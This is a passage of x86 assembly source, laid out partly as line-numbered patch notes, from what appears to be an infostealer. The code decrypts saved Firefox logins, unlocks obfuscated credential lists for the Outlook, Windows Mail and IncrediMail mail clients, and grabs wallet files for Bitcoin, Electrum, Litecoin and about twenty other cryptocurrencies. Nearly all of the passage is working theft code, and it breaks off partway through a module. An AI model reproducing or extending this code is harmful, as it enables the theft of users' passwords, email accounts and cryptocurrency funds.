ChromeCommonScan endp

ENDIF

IFDEF COMPILE_MOZILLA_CODE

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Common Mozilla SQLite3 database decryption

.data
	szMozillaLoginTable db	'moz_logins',0
	szMozillaActionURL	db	'hostname',0
	szMozillaPassValue	db	'encryptedPassword',0
	szMozillaUserValue	db	'encryptedUsername',0

.data?
	dwMozillaActionURLIndex	dd	?
	dwMozillaPassValueIndex	dd	?
	dwMozillaUserValueIndex	dd	?

.code

; Process SQL column definition 
SQLiteProcessMozillaColDef proc uses edi column_definition, column_index
	invoke	Trim, column_definition
	invoke	StrStrI, column_definition, offset szSQLiteSpaceChar
	.IF	!eax
	
Line 8102 (code addition):
	mov	byte ptr[eax], 0
	invoke	Trim, column_definition

Line 8105 (code addition/deletion):
	mov	edi, offset szSQLiteStopWords
@@:
	invoke	lstrcmpi, edi, column_definition
	.IF	!eax

line 8113 (code addition/deletion):
invoke	lstrlen, column_definition
	.IF	!eax

Line 8118 (code addition/remove):
	invoke	lstrcmpi, column_definition, offset szMozillaActionURL
	.IF	!eax
		m2m	dwMozillaActionURLIndex, column_index
		
Line 8123 (code addition/remove):
	invoke	lstrcmpi, column_definition, offset szMozillaPassValue
	.IF	!eax
		m2m	dwMozillaPassValueIndex, column_index

Line 8128 (code addition/deletion):
	invoke	lstrcmpi, column_definition, offset szMozillaUserValue
	.IF	!eax
		m2m	dwMozillaUserValueIndex, column_index

Line 8133 (code addition/deletion):
	mov	eax, TRUE
	ret
SQLiteProcessMozillaColDef endp

; Process password data row
SQLiteProcessMozillaDataTable proc stream, target_stream, row_array, cell_count, item_id
	LOCAL	url_cell_len: DWORD
	LOCAL	url_cell_type: DWORD
	LOCAL	url_cell_data: DWORD
	LOCAL	user_cell_len: DWORD
	LOCAL	user_cell_type: DWORD
	LOCAL	user_cell_data: DWORD
	LOCAL	pass_cell_len: DWORD
	LOCAL	pass_cell_type: DWORD
	LOCAL	pass_cell_data: DWORD
	LOCAL	host: DWORD
	LOCAL	user: DWORD
	LOCAL	pass: DWORD

	.IF	!cell_count

Line 8155 (code addition/deletion):
	mov	eax, cell_count
	.IF	(dwMozillaActionURLIndex < eax) && (dwMozillaPassValueIndex < eax) && (dwMozillaUserValueIndex < eax)
		; Get cell values
		invoke	SQLiteGetRecordArrayCell, row_array, dwMozillaActionURLIndex, addr url_cell_len, addr url_cell_type, addr url_cell_data
		invoke	SQLiteGetRecordArrayCell, row_array, dwMozillaUserValueIndex, addr user_cell_len, addr user_cell_type, addr user_cell_data
		invoke	SQLiteGetRecordArrayCell, row_array, dwMozillaPassValueIndex, addr pass_cell_len, addr pass_cell_type, addr pass_cell_data

		.IF	url_cell_len && pass_cell_len
			mov	edx, url_cell_len
			inc	edx
			invoke	MemAlloc, edx
			mov	host, eax
			invoke	MoveMem, url_cell_data, host, url_cell_len
		
			mov	user, NULL
			mov	pass, NULL
			
			.IF	mozilla_mode == MOZILLA_MODE_FTP_HTTP
				invoke	lstrlen, offset szMozillaFTP
				invoke	StrCmpNI, host, offset szMozillaFTP, eax
				IFDEF	GRAB_HTTP
				.IF	eax
					invoke	lstrlen, offset szMozillaHTTP
					invoke	StrCmpNI, host, offset szMozillaHTTP, eax
				.ENDIF
				.IF	eax
					invoke	lstrlen, offset szMozillaHTTPS
					invoke	StrCmpNI, host, offset szMozillaHTTPS, eax
				.ENDIF
				IFDEF	COLLECT_PROXY_SETTINGS
				.IF	eax
					invoke	lstrlen, offset szMozillaProxy
					invoke	StrCmpNI, host, offset szMozillaProxy, eax
				.ENDIF
				ENDIF
				ENDIF
			.ELSEIF mozilla_mode == MOZILLA_MODE_FIREFTP
				invoke	lstrlen, offset szMozillaFireFTP
				invoke	StrCmpNI, host, offset szMozillaFireFTP, eax
			.ELSEIF mozilla_mode == MOZILLA_MODE_EMAIL
				sub	eax, eax ; allow all hosts
			.ENDIF
			
			.IF	!eax
				; user (can be empty for some record types)
				.IF	user_cell_len
					invoke	MozillaNSSDecryptPassword, user_cell_data, user_cell_len
					mov	user, eax
				.ENDIF
				
				; pass
				invoke	MozillaNSSDecryptPassword, pass_cell_data, pass_cell_len
				mov	pass, eax
				
				.IF	host && pass
					; export recovered data
					invoke	StreamWriteDWORD, target_stream, item_id
					invoke	StreamWriteString, target_stream, host
					invoke	StreamWriteString, target_stream, user
					invoke	StreamWriteString, target_stream, pass
				.ENDIF 
			.ENDIF
			
			invoke	MemFree, user
			invoke	MemFree, pass
			invoke	MemFree, host
		.ENDIF

Line 8225 (code addition/deletion):
	ret
SQLiteProcessMozillaDataTable endp

SQLiteProcessMozillaSchemaTable proc stream, target_stream, row_array, cell_count, item_id
	LOCAL	cell_len: DWORD
	LOCAL	cell_type: DWORD
	LOCAL	cell_data: DWORD
	LOCAL	table_name: DWORD
	LOCAL	root_page: DWORD
	LOCAL	dwStatusCode: DWORD

	.IF	cell_count == 5
		; Validate table column count
		invoke	SQLiteGetRecordArrayCell, row_array, 2, addr cell_len, addr cell_type, addr cell_data
		.IF	cell_type == SQLITE_DATATYPE_STR
			m2m	table_name, cell_data
			invoke	lstrcmpi, table_name, offset szMozillaLoginTable
			.IF	!eax
				invoke	SQLiteGetRecordArrayCell, row_array, 0, addr cell_len, addr cell_type, addr cell_data
				.IF	cell_type == SQLITE_DATATYPE_STR
					invoke	lstrcmp, offset szSQLite3TableType, cell_data
					.IF	!eax
						invoke	SQLiteGetRecordArrayCell, row_array, 3, addr cell_len, addr cell_type, addr cell_data
						.IF	cell_type == SQLITE_DATATYPE_INT
							mov	eax, cell_data
							m2m	root_page, dword ptr[eax]
							
							invoke	SQLiteGetRecordArrayCell, row_array, 4, addr cell_len, addr cell_type, addr cell_data
							.IF	cell_type == SQLITE_DATATYPE_STR
								mov	dwMozillaActionURLIndex, -1
								mov	dwMozillaPassValueIndex, -1
								mov	dwMozillaUserValueIndex, -1

								invoke	SQLiteProcessSQL, cell_data, offset SQLiteProcessMozillaColDef
								mov	dwStatusCode, TRUE
								
								.IF	(dwMozillaActionURLIndex != -1) && (dwMozillaPassValueIndex != -1) && (dwMozillaUserValueIndex != -1)
									invoke	SQLiteReadPage, stream, target_stream, root_page, addr dwStatusCode, item_id, offset SQLiteProcessMozillaDataTable
								.ENDIF
							.ENDIF
						.ENDIF 
					.ENDIF	
				.ENDIF
			.ENDIF
		.ENDIF
		
Line 8271 (code deletion):
mov	dwSQLiteEncoding, eax etc....

Line 8272 (code edition):
SQLiteProcessMozillaSchemaTable endp

Line 8272 (code edition):
ProcessMozillaSQLiteFile proc target_stream, szSQLFileName, item_id

Line 8280 (code addition):
, item_id, offset SQLiteProcessMozillaSchemaTable

Line 8290 (code edition/remove):
ProcessSQLiteFile endp -> ProcessMozillaSQLiteFile endp
ChromeAppDataCommonSingleFileScan procedure deleted.

Line 8299 (comment added):
; Tested: Google Chrome 29.0.1547.66 m

Line 8374 (code edition):
ProcessSQLiteFile -> ProcessChromeSQLiteFile
Line 8375 (code edition):
ProcessSQLiteFile -> ProcessChromeSQLiteFile

Line 9307 (procedure rename, check Line 198):
			invoke	IsDataAlreadyProcessed, map.lpMem, map.dwFileSize

Line 10932 (code addition):
	mov	byte ptr[CWindowsMailPasswordList+1], 'P'
	mov	byte ptr[CWindowsMailSMTPPass+1], 'S'

Line 11392 (code addition):
	mov	byte ptr[CIncrediMailSMTPServer], 'S'
	mov	byte ptr[CIncrediMailSMTPPort], 'S'
	mov	byte ptr[CIncrediMailSMTPUser], 'S'
	mov	byte ptr[CIncrediMailSMTPPass], 'S'

Line 11622 (code deletion):
base_path, do_decrypt <- (removed 'do_encrypt')

Line 11734 (code deletion):
reg_key, S, 0 <- (removed '0')

Line 11959 (code addition):
	.IF	bListEncrypted
		mov	bListEncrypted, FALSE
		invoke	DecipherList, offset COutlookRegValues
		invoke	DecipherList, offset COutlookBinaryValues
		invoke	DecipherList, offset COutlookPassValues
		invoke	DecipherList, offset COutlookPassValues2
	.ENDIF

Line 12087 (code addition):
; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Bitcoin
; http://bitcoin.org
; Tested: 0.8.1-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_BITCOIN

.data
	CBitconWalletFile		db	'wallet.dat',0
	CBitcoinAppDataDir		db	'\Bitcoin',0

.code

GrabBitcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_BITCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CBitcoinAppDataDir, offset CBitconWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabBitcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Electrum
; http://electrum.org/
; Tested: 1.7.3
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_ELECTRUM

.data
	CElectrumWalletFile		db	'electrum.dat',0
	CElectrumAppDataDir		db	'\Electrum',0

.code

GrabElectrum proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_ELECTRUM, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CElectrumAppDataDir, offset CElectrumWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabElectrum endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; MultiBit
; http://multibit.org
; Tested: 0.5.9
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_ELECTRUM

.data
	CMultiBitWalletFile		db	'.wallet',0
	CMultiBitAppDataDir		db	'\MultiBit',0

.code

GrabMultiBit proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_MULTIBIT, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CMultiBitAppDataDir, offset CMultiBitWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabMultiBit endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; FTP Disk
; Tested: ver 1.2
; SFTP: implemented

IFDEF COMPILE_MODULE_FTPDISK

.data
	CFTPDiskAccountsFile	db	'Accounts.ini',0
	CFTPDiskAppDataDir		db	'\Maxprog\FTP Disk',0

.code

GrabFTPDisk proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_FTPDISK, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CFTPDiskAppDataDir, offset CFTPDiskAccountsFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabFTPDisk endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Litecoin
; https://litecoin.org/
; Tested: v0.8.5.1-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_LITECOIN

.data
	CLitecoinWalletFile		db	'wallet.dat',0
	CLitecoinAppDataDir		db	'\Litecoin',0

.code

GrabLitecoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_LITECOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CLitecoinAppDataDir, offset CLitecoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabLitecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Namecoin
; http://namecoin.info/
; Tested: 0.3.72
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_LITECOIN

.data
	CNamecoinWalletFile		db	'wallet.dat',0
	CNamecoinAppDataDir		db	'\Namecoin',0

.code

GrabNamecoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_NAMECOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CNamecoinAppDataDir, offset CNamecoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabNamecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Terracoin
; http://www.terracoin.org/
; Tested: v0.8.0.2
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_TERRACOIN

.data
	CTerracoinWalletFile		db	'wallet.dat',0
	CTerracoinAppDataDir		db	'\Terracoin',0

.code

GrabTerracoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_TERRACOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CTerracoinAppDataDir, offset CTerracoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabTerracoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Bitcoin Armory
; https://bitcoinarmory.com/
; Tested: Version 0.90-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_BITCOINARMORY

.data
	CBitcoinArmoryWalletFile	db	'.wallet',0
	CBitcoinArmoryAppDataDir	db	'\Armory',0

.code

GrabBitcoinArmory proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_BITCOINARMORY, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CBitcoinArmoryAppDataDir, offset CBitcoinArmoryWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabBitcoinArmory endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; PPCoin (Peercoin)
; https://ppcoin.com/
; Tested: v.0.3.0ppc-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_PPCOIN

.data
	CPPCoinWalletFile			db	'wallet.dat',0
	CPPCoinAppDataDir			db	'\PPCoin',0

.code

GrabPPCoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_PPCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CPPCoinAppDataDir, offset CPPCoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabPPCoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Primecoin
; http://primecoin.org/
; Tested: v0.1.2xpm-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_PRIMECOIN

.data
	CPrimecoinWalletFile		db	'wallet.dat',0
	CPrimecoinAppDataDir		db	'\Primecoin',0

.code

GrabPrimecoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_PRIMECOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CPrimecoinAppDataDir, offset CPrimecoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabPrimecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Feathercoin
; http://feathercoin.com/
; Tested: v0.6.4.4
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_PRIMECOIN

.data
	CFeathercoinWalletFile		db	'wallet.dat',0
	CFeathercoinAppDataDir		db	'\Feathercoin',0

.code

GrabFeathercoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_FEATHERCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CFeathercoinAppDataDir, offset CFeathercoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabFeathercoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; NovaCoin
; http://novaco.in/
; Tested: v0.4.4.0-g32a928e-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_NOVACOIN

.data
	CNovaCoinWalletFile			db	'wallet.dat',0
	CNovaCoinAppDataDir			db	'\NovaCoin',0

.code

GrabNovaCoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_NOVACOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CNovaCoinAppDataDir, offset CNovaCoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabNovaCoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Freicoin
; http://freico.in/
; Tested: v0.8.3.0-unk-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_FREICOIN

.data
	CFreicoinWalletFile			db	'wallet.dat',0
	CFreicoinAppDataDir			db	'\Freicoin',0

.code

GrabFreicoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_FREICOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CFreicoinAppDataDir, offset CFreicoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabFreicoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Devcoin
; http://devcoin.org/
; Tested: version 0.3.25.1-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_DEVCOIN

.data
	CDevcoinWalletFile			db	'wallet.dat',0
	CDevcoinAppDataDir			db	'\Devcoin',0

.code

GrabDevcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_DEVCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CDevcoinAppDataDir, offset CDevcoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabDevcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Frankocoin
; http://frankos.org/
; Tested: v0.8.4.1-16-g5f1dafe-bet
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_FRANKOCOIN

.data
	CFrankocoinWalletFile			db	'wallet.dat',0
	CFrankocoinAppDataDir			db	'\Franko',0

.code

GrabFrankocoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_FRANKOCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CFrankocoinAppDataDir, offset CFrankocoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabFrankocoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; ProtoShares
; http://invictus-innovations.com/protoshares
; Tested: v0.8.5.0-unk-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_PROTOSHARES

.data
	CProtoSharesWalletFile			db	'wallet.dat',0
	CProtoSharesAppDataDir			db	'\ProtoShares',0

.code

GrabProtoShares proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_PROTOSHARES, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CProtoSharesAppDataDir, offset CProtoSharesWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabProtoShares endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Megacoin
; http://www.megacoin.co.nz
; Tested: v0.8.996.0MEGA-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_MEGACOIN

.data
	CMegacoinWalletFile				db	'wallet.dat',0
	CMegacoinAppDataDir				db	'\Megacoin',0

.code

GrabMegacoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_MEGACOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CMegacoinAppDataDir, offset CMegacoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabMegacoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Quarkcoin
; http://www.quarkcoin.com/
; Tested: v0.8.3.0-g09e437b-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_QUARKCOIN

.data
	CQuarkcoinWalletFile			db	'wallet.dat',0
	CQuarkcoinAppDataDir			db	'\Quarkcoin',0

.code

GrabQuarkcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_QUARKCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CQuarkcoinAppDataDir, offset CQuarkcoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabQuarkcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; WorldCoin
; http://worldcoin.in
; Tested: v0.6.4.4-ga7433e7-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_WORLDCOIN

.data
	CWorldCoinWalletFile			db	'wallet.dat',0
	CWorldCoinAppDataDir			db	'\Worldcoin',0

.code

GrabWorldcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_WORLDCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CWorldCoinAppDataDir, offset CWorldCoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabWorldcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Infinitecoin
; http://infinitecoin.com/
; Tested: v1.8.0.0
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_WORLDCOIN

.data
	CInfinitecoinWalletFile			db	'wallet.dat',0
	CInfinitecoinAppDataDir			db	'\Infinitecoin',0

.code

GrabInfinitecoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_INFINITECOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CInfinitecoinAppDataDir, offset CInfinitecoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabInfinitecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Ixcoin
; http://ixcoin.org/
; Tested: 0.3.24.30-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_IXCOIN

.data
	CIxcoinWalletFile				db	'wallet.dat',0
	CIxcoinAppDataDir				db	'\Ixcoin',0

.code

GrabIxcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_IXCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CIxcoinAppDataDir, offset CIxcoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabIxcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Anoncoin
; https://anoncoin.net
; Tested: v0.7.4b-5-gd36ff9d-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_IXCOIN

.data
	CAnoncoinWalletFile				db	'wallet.dat',0
	CAnoncoinAppDataDir				db	'\Anoncoin',0

.code

GrabAnoncoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_ANONCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CAnoncoinAppDataDir, offset CAnoncoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabAnoncoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; BBQcoin
; http://bbqcoin.org/
; Tested: v0.6.3.0-unk-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_BBQCOIN

.data
	CBBQcoinWalletFile				db	'wallet.dat',0
	CBBQcoinAppDataDir				db	'\BBQcoin',0

.code

GrabBBQcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_BBQCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CBBQcoinAppDataDir, offset CBBQcoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabBBQcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Digitalcoin
; http://digitalcoin.co/en/
; Tested: v1.0.0.0-g3aaa7ba-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_DIGITALCOIN

.data
	CDigitalcoinWalletFile				db	'wallet.dat',0
	CDigitalcoinAppDataDir				db	'\Digitalcoin',0

.code

GrabDigitalcoin proc stream
	LOCAL	hdr_ofs: DWORD

